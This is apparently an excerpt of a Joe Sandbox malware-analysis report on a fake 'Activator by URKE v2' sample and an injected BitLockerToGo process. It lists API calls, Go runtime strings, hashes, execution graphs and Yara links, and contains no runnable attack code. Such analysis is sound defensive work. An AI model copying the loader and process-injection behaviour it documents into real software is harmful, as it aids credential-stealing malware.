                                                                                                                                                                                                                                                  • API ID: DialogParamVisibleWindow
                                                                                                                                                                                                                                                  • String ID: GETPASSWORD1
                                                                                                                                                                                                                                                  • API String ID: 3157717868-3292211884
                                                                                                                                                                                                                                                  • Opcode ID: a2794da179741b2778ea55df48dbaa3dbee7a858d049ebb80305366bfd0fb870
                                                                                                                                                                                                                                                  • Instruction ID: 990b3c9fd3ceed528e81bfccb802c7ce300d96564ea133aa06ba1167cdb76377
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a2794da179741b2778ea55df48dbaa3dbee7a858d049ebb80305366bfd0fb870
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F319325A0D68A81EA01EF52A5302F4BB20AF45F85FC80073D98D873A6DE3CE950C772
                                                                                                                                                                                                                                                  Function 00007FF7E5F22014 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FileHandleType
                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                  • API String ID: 3000768030-2766056989
                                                                                                                                                                                                                                                  • Opcode ID: cfc5635d5d47b790a45b886e407ba3a029ac6da1d5fa2ca2579a3853925e004a
                                                                                                                                                                                                                                                  • Instruction ID: ca02a716f3f20e018b37f866b0c30162b25614ac2eb5ca577f26070c19710efd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cfc5635d5d47b790a45b886e407ba3a029ac6da1d5fa2ca2579a3853925e004a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D21D666A0864A80EB60DB25A8B03B9A650EB45F74F640337D6AF477D4CE3DD881C313
                                                                                                                                                                                                                                                  Function 00007FF7E5F17848 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7E5F157EE), ref: 00007FF7E5F1788C
                                                                                                                                                                                                                                                  • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7E5F157EE), ref: 00007FF7E5F178D2
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                                  • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                  • Opcode ID: f9cbc5942d5ed5241ddbc86705efc511784e5adb6a39813d68a5b78bd03bb5cb
                                                                                                                                                                                                                                                  • Instruction ID: 955bbe946d9d5a0d1ea2e068b2a586f47d7166e6dd0c807c632205bbd593d887
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f9cbc5942d5ed5241ddbc86705efc511784e5adb6a39813d68a5b78bd03bb5cb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 34118F32A09B8982EB109F15F5502AAB7A4FB88F98F684231DF8D47759DF3CD451CB01
                                                                                                                                                                                                                                                  Function 00007FF7E5EFA83C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2317553503.00007FF7E5EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7E5EF0000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317498174.00007FF7E5EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317583589.00007FF7E5F2B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317605599.00007FF7E5F46000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2317648341.00007FF7E5F5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff7e5ef0000_Activator by URKE v2.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FindHandleModuleResource
                                                                                                                                                                                                                                                  • String ID: RTL
                                                                                                                                                                                                                                                  • API String ID: 3537982541-834975271
                                                                                                                                                                                                                                                  • Opcode ID: a45610fe9d42f5f181feef3a06741817b69cf11aeaebfa57cd0cb73b5dfd576c
                                                                                                                                                                                                                                                  • Instruction ID: 1f7542ea8e279648d9ceaad4a2a0f8ed9adc4debdc34f6a1577a670ca11d62a3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a45610fe9d42f5f181feef3a06741817b69cf11aeaebfa57cd0cb73b5dfd576c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1CD01295F0964B81FF19AB62A4547B452549B18F42F880039CC1D8B350EE7DA494C766

                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                  Function 00759D60 Relevance: 10.2, Strings: 8, Instructions: 189COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • CreateWaitableTimerEx when creating timer failedruntime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject wait_failed; errno=strconv: illegal AppendFloat/FormatFloat bitSizenot enough significant bits after mult64bitPow10reflect: CallSlice w, xrefs: 0075A05D
                                                                                                                                                                                                                                                  • runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zeroreflect: nil type passed to Type.AssignableToreflect: internal error: invalid method indexreflect.MakeChan: unidirectional ch, xrefs: 0075A029
                                                                                                                                                                                                                                                  • VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timer3552713678800500929355621337890625reflect: Method index out of rangereflect: ChanDir of no, xrefs: 0075A002
                                                                                                                                                                                                                                                  • runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpruntime: unexpected SPWRITE function all goroutines are asleep - deadlock!2220446049250313080847263336181640625reflect: Bits of non-arithmetic Type r, xrefs: 0075A0B8
                                                                                                                                                                                                                                                  • bad g0 stackself-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatch%!(BADWIDTH)152587890625762939453125 has no name has no typereflect., xrefs: 00759FA7
                                                                                                                                                                                                                                                  • runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zeroreflect: nil type passed to Type.AssignableToreflect: internal error: invalid me, xrefs: 0075A084
                                                                                                                                                                                                                                                  • runtime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime: bad notifyList size - sync=accessed data from freed user arena runtime:, xrefs: 00759FCE
                                                                                                                                                                                                                                                  • %, xrefs: 0075A0C1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.2281043381.0000000000721000.00000020.00000001.01000000.00000009.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2280953380.0000000000720000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2281866991.0000000000C57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2282965987.00000000011DB000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2283007173.00000000011DD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2283040286.00000000011E3000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2283067504.00000000011E5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2283088348.00000000011E6000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2283088348.0000000001206000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2283462122.00000000016EA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2283482316.00000000016F7000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2283500165.00000000016F8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2283518140.00000000016FB000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2283538356.00000000016FD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2283556578.00000000016FE000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2283579055.0000000001713000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2283579055.000000000171D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2283579055.0000000001756000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2283579055.000000000175B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2283663880.0000000001760000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2283681826.0000000001761000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.2283681826.00000000017AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_720000_n3.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: %$CreateWaitableTimerEx when creating timer failedruntime.preemptM: duplicatehandle failed; errno=runtime: waitforsingleobject wait_failed; errno=strconv: illegal AppendFloat/FormatFloat bitSizenot enough significant bits after mult64bitPow10reflect: CallSlice w$VirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timer3552713678800500929355621337890625reflect: Method index out of rangereflect: ChanDir of no$bad g0 stackself-preempt [recovered]bad recoverybad g statusentersyscallwirep: p->m=) p->status=releasep: m= sysmonwait= preemptoff=cas64 failed m->gsignal=-byte limitruntime: sp=abi mismatch%!(BADWIDTH)152587890625762939453125 has no name has no typereflect.$runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zeroreflect: nil type passed to Type.AssignableToreflect: internal error: invalid me$runtime.minit: duplicatehandle failed_cgo_notify_runtime_init_done missingstartTheWorld: inconsistent mp->nextpruntime: unexpected SPWRITE function all goroutines are asleep - deadlock!2220446049250313080847263336181640625reflect: Bits of non-arithmetic Type r$runtime: CreateWaitableTimerEx failed; errno=exitsyscall: syscall frame is no longer validunsafe.String: ptr is nil and len is not zeroreflect: nil type passed to Type.AssignableToreflect: internal error: invalid method indexreflect.MakeChan: unidirectional ch$runtime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnableruntime: bad notifyList size - sync=accessed data from freed user arena runtime:
                                                                                                                                                                                                                                                  • API String ID: 0-1595550274
                                                                                                                                                                                                                                                  • Opcode ID: 803a144c3a2fe9e2e89bccf082f9c3e7aa7b60cef5ad65b677a6301bf3a35fad
                                                                                                                                                                                                                                                  • Instruction ID: 83c7edbd2b351cf660ff9111c119cae8e623ccad82a0b8477155eefc4c150c52
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 803a144c3a2fe9e2e89bccf082f9c3e7aa7b60cef5ad65b677a6301bf3a35fad
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F991D4B4509705CFD304EF68D19975ABBF4BF88715F00892DE88887352D7B99948CB53

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:1.2%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                  Signature Coverage:5.9%
                                                                                                                                                                                                                                                  Total number of Nodes:51
                                                                                                                                                                                                                                                  Total number of Limit Nodes:10
                                                                                                                                                                                                                                                  execution_graph 19565 40d240 19566 40d249 19565->19566 19567 40d251 GetInputState 19566->19567 19568 40d43e ExitProcess 19566->19568 19569 40d25e 19567->19569 19570 40d266 GetCurrentThreadId GetCurrentProcessId 19569->19570 19571 40d434 19569->19571 19572 40d298 19570->19572 19571->19568 19572->19571 19574 411ef0 CoInitialize 19572->19574 19575 4101f0 19576 410457 19575->19576 19577 410889 19576->19577 19579 446f50 19576->19579 19580 446fd7 19579->19580 19581 446fcc 19579->19581 19582 446f79 19579->19582 19583 446f6b 19579->19583 19591 444430 19580->19591 19588 4443b0 19581->19588 19584 446fb6 RtlReAllocateHeap 19582->19584 19583->19580 19583->19582 19587 446fd2 19584->19587 19587->19576 19589 444406 RtlAllocateHeap 19588->19589 19590 4443d6 19588->19590 19589->19587 19590->19589 19592 4444a9 19591->19592 19594 444446 19591->19594 19592->19587 19593 444496 RtlFreeHeap 19593->19592 19594->19593 19605 447a51 19606 447a56 19605->19606 19609 447b42 19606->19609 19611 4474b0 LdrInitializeThunk 19606->19611 19607 447b51 19609->19607 19612 4474b0 LdrInitializeThunk 19609->19612 19611->19609 19612->19609 19613 447f82 19615 447fa4 19613->19615 19614 447ffe 19615->19614 19617 4474b0 LdrInitializeThunk 19615->19617 19617->19614 19618 4108f7 19620 410889 19618->19620 19621 41056b 19618->19621 19619 446f50 3 API calls 19619->19621 19621->19619 19621->19620 19622 40ef48 19623 40f02f 19622->19623 19626 40fba0 19623->19626 19625 40f060 19629 40fc30 19626->19629 19627 446f50 3 API calls 19627->19629 19628 40fc55 19628->19625 19629->19627 19629->19628 19630 44675a 19631 4467db LoadLibraryExW 19630->19631 19632 4467a8 19630->19632 19633 4467f1 19631->19633 19632->19631

                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                  Function 004474B0 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 412 4474b0-4474e2 LdrInitializeThunk
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LdrInitializeThunk.NTDLL(0044AD9D,005C003F,00000006,?,?,00000018,C0C7C6C5,?,?), ref: 004474DE
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                  • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                                                                                                                                                  • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                                                                                                                                                                                                                                  Function 0044675A Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 70libraryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 62 44675a-4467a6 63 4467a8 62->63 64 4467db-4467eb LoadLibraryExW 62->64 65 4467b0-4467d9 call 4472b0 63->65 66 446ee5-446f29 64->66 67 4467f1-44681a 64->67 65->64 67->66
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(Y?L1,00000000,00000800), ref: 004467E7
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                                                                  • String ID: (O2A$<CBE$SGJ?$Y?L1$zKtM
                                                                                                                                                                                                                                                  • API String ID: 1029625771-3949311573
                                                                                                                                                                                                                                                  • Opcode ID: b05707db2f125eda5d1fdc215bd14d6b7d416d152ba3a0137072a56ae6d71b9f
                                                                                                                                                                                                                                                  • Instruction ID: 7006df5c9ba4c4eb951759edf0ff7b1ab7c3263103615ff2e5ba6ef147d772cb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b05707db2f125eda5d1fdc215bd14d6b7d416d152ba3a0137072a56ae6d71b9f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7214A7620C340AFD3448F29E890A1EBBF1AB86355F99982DF4A987352D734D845CB1A
                                                                                                                                                                                                                                                  Function 0040D240 Relevance: 6.2, APIs: 4, Instructions: 168threadCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 137 40d240-40d24b call 445ec0 140 40d251-40d260 GetInputState call 43d4e0 137->140 141 40d43e-40d440 ExitProcess 137->141 144 40d266-40d296 GetCurrentThreadId GetCurrentProcessId 140->144 145 40d439 call 446f30 140->145 146 40d2c6-40d2ef 144->146 147 40d298 144->147 145->141 150 40d2f1 146->150 151 40d326-40d328 146->151 149 40d2a0-40d2c4 call 40d450 147->149 149->146 153 40d300-40d324 call 40d4d0 150->153 154 40d3d6-40d3f8 151->154 155 40d32e-40d344 151->155 153->151 157 40d426 call 40ed60 154->157 158 40d3fa 154->158 160 40d346 155->160 161 40d379-40d3a2 155->161 170 40d42b-40d42d 157->170 163 40d400-40d424 call 40d670 158->163 166 40d350-40d377 call 40d570 160->166 161->154 162 40d3a4 161->162 168 40d3b0-40d3d4 call 40d5f0 162->168 163->157 166->161 168->154 170->145 174 40d42f-40d434 call 411ef0 call 4101e0 170->174 174->145
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CurrentProcess$ExitInputStateThread
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1029096631-0
                                                                                                                                                                                                                                                  • Opcode ID: c14ddecb69e59047660bcbd02f4c4e0bfc2371d56cc96fd310b6fed761d84219
                                                                                                                                                                                                                                                  • Instruction ID: cc5493a413f301da5963149821234f5dc2a0fb244e8c1f48303ea8f271895597
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c14ddecb69e59047660bcbd02f4c4e0bfc2371d56cc96fd310b6fed761d84219
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A341397480C340ABD701BBA9D544A1EFBE5AF52705F448D2EE5C4A7392D33AD818CB6B
                                                                                                                                                                                                                                                  Function 00446F50 Relevance: 1.6, APIs: 1, Instructions: 50memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 383 446f50-446f64 384 446fd7-446fd8 call 444430 383->384 385 446fcc-446fcd call 4443b0 383->385 386 446f79-446f8e 383->386 387 446f6b-446f72 383->387 395 446fdd-446fe0 384->395 394 446fd2-446fd5 385->394 388 446fb6-446fca RtlReAllocateHeap 386->388 389 446f90-446fb4 call 447430 386->389 387->384 387->386 393 446fe2 388->393 389->388 397 446fe5-446fe7 393->397 394->397 395->393
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 00446FC4
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                  • Opcode ID: e4651491361086169ccfcbd33c73f7565caaa82593336de2d4bfaf81bbccc4fd
                                                                                                                                                                                                                                                  • Instruction ID: b8336f78a23e17fb0fdc88f342f41f3c00e1d394e935a1e997b9b51d7c19cda6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e4651491361086169ccfcbd33c73f7565caaa82593336de2d4bfaf81bbccc4fd
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC01AD355182409BE301AF28F904A1EBBF4AF86B05F454C2DF8C487212D73AE8158BA7
                                                                                                                                                                                                                                                  Function 00444430 Relevance: 1.5, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 398 444430-44443f 399 444446-444460 398->399 400 4444a9-4444ad 398->400 401 444496-4444a3 RtlFreeHeap 399->401 402 444462 399->402 401->400 403 444470-444494 call 4473a0 402->403 403->401
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(?,00000000), ref: 004444A3
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3298025750-0
                                                                                                                                                                                                                                                  • Opcode ID: 9ccb0440a41137a15d0f9b5e9d05462d592ff4b66adc338744bb2838cbae25a0
                                                                                                                                                                                                                                                  • Instruction ID: f4fa65e32483cb32cb6847a63ba216f7b0397596ed0cbadc3b287453508ae5bb
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ccb0440a41137a15d0f9b5e9d05462d592ff4b66adc338744bb2838cbae25a0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18F0373050D2409BE301AF28E945B0EBBE4EF96705F558C6CE5C49B262C33ADC64DBA7
                                                                                                                                                                                                                                                  Function 004443B0 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 406 4443b0-4443d4 407 444406-444420 RtlAllocateHeap 406->407 408 4443d6 406->408 409 4443e0-444404 call 447330 408->409 409->407
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00444417
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2311128345.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                  • Opcode ID: 9326dca51c3ea4754864e7de6d17c415482df809601257387dea451816e9ead0
                                                                                                                                                                                                                                                  • Instruction ID: f8c0f0e4b3a01778a3f4afd4277ca57db95b9ad9f8e9bb4eb65051ea0965aeb6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9326dca51c3ea4754864e7de6d17c415482df809601257387dea451816e9ead0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B3F0E77410C2809BE301EB18D955B1EBBE5EF96704F54882CE4C587262D339D828DB5B

                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                  Function 00411F33 Relevance: 34.5, APIs: 2, Strings: 17, Instructions: 1247COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00412356
